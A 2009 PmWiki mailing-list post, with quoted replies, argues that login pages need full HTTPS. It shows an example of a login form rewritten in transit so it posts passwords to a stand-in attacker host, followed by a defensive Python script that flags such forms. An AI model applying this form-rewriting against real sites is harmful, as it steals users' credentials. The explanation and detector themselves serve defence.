[pmwiki-users] security (again!)
ollebe at student.chalmers.se
Mon Mar 9 16:23:58 CDT 2009
Agreed, but much more important is the fact that the user knows that he is
seeing the real login page. Without true HTTPS (with a trusted certificate)
the user doesn't know if his connection has been tampered with so that he's
visiting a phishing site. That phishing site could look just like the original,
and seem to be located at the same URL. But it could send the password to the
attacker's web application instead of to the PmWiki.
Original page at address http://mywiki.somewhery6ne6un4ue.org/wiki/pmwiki.php:
^ Notice there's no httpS in that URL
<form action="https://mywiki.somewhere.org/wiki/pmwiki.php"> Your password is
SOO secure, coz i'm using HTTPS!!11
<input bla bla ....
Gets modified, while on the network, to the phishing page, which still seems to
be at http://mywiki.somewhere.org/wiki/pmwiki.php:
<form action="http://attacker.evilstuff45yn45yuns3.com/wiki/pmwiki.php"> Your
password is SOO secure, coz i'm using HTTPS!!11
<input bla bla.. ...
And the attacker would get the password.
On Monday 09 March 2009 21.32.49 James M wrote:
> Yes my feeling exactly. I was considering changing the login page to point
> out that the passwords would be sent encrypted. But having https in the
> address bar (and coloured yellow if you use some browsers) would be much
> On Mon, Mar 9, 2009 at 6:21 PM, Randy Brown <randy at brownragfilms.com> wrote:
> > A user may want assurance before typing a password that the password
> > will not be sent in the clear. Seeing "https" in the browser's address
> > bar is reassuring.
> > Randy
> > On Mar 9, 2009, at 1:10 PM, Guillermo Calderon - INCO wrote:
> > > Can you explain this point better?
> > > I don't see why it is necessary to send the login page encrypted
> > _______________________________________________
> > pmwiki-users mailing list
> > pmwiki-users at pmichaud.com
> > http://www.pmichaud.com/mailman/listinfo/pmwiki-users
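The tampering described in the message above (a login page served over plain HTTP whose form action is rewritten in transit) can be checked for on the defending side. The following is an added example, not code from the thread or from PmWiki: it parses a page's forms and flags a page that is not itself served over HTTPS, a form that submits over HTTP, or a form that submits to a host other than the page's own. The HTML snippets and the attacker.example host are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormActions(HTMLParser):
    """Collect the action attribute of every <form> in a page."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            # A bare <form> (no action) submits back to the page URL.
            self.actions.append(dict(attrs).get("action") or "")


def audit_login_page(page_url, html):
    """Return a list of findings for the login page at page_url.

    The page itself must be served over HTTPS (otherwise an on-path
    attacker can rewrite the form before the user ever sees it), and
    every form must submit over HTTPS to the same host as the page.
    """
    findings = []
    page = urlsplit(page_url)
    if page.scheme != "https":
        findings.append("page served over %s: form can be rewritten in transit" % page.scheme)
    parser = _FormActions()
    parser.feed(html)
    for action in parser.actions:
        target = urlsplit(urljoin(page_url, action))  # resolve relative actions
        if target.scheme != "https":
            findings.append("form posts over %s to %s" % (target.scheme, target.netloc))
        if target.hostname != page.hostname:
            findings.append("form posts to foreign host %s" % target.netloc)
    return findings


# Constructed sample pages, modelled on the two snippets in the message above.
ORIGINAL_PAGE = '<form action="https://mywiki.somewhere.org/wiki/pmwiki.php"><input name="password"></form>'
TAMPERED_PAGE = '<form action="http://attacker.example/wiki/pmwiki.php"><input name="password"></form>'

if __name__ == "__main__":
    for label, html in (("original", ORIGINAL_PAGE), ("tampered", TAMPERED_PAGE)):
        print(label, audit_login_page("http://mywiki.somewhere.org/wiki/pmwiki.php", html))
```

Note that the unmodified page still produces a finding: an HTTPS form action on an HTTP page is exactly the situation the message warns about, since nothing stops the action from being rewritten before the browser renders it.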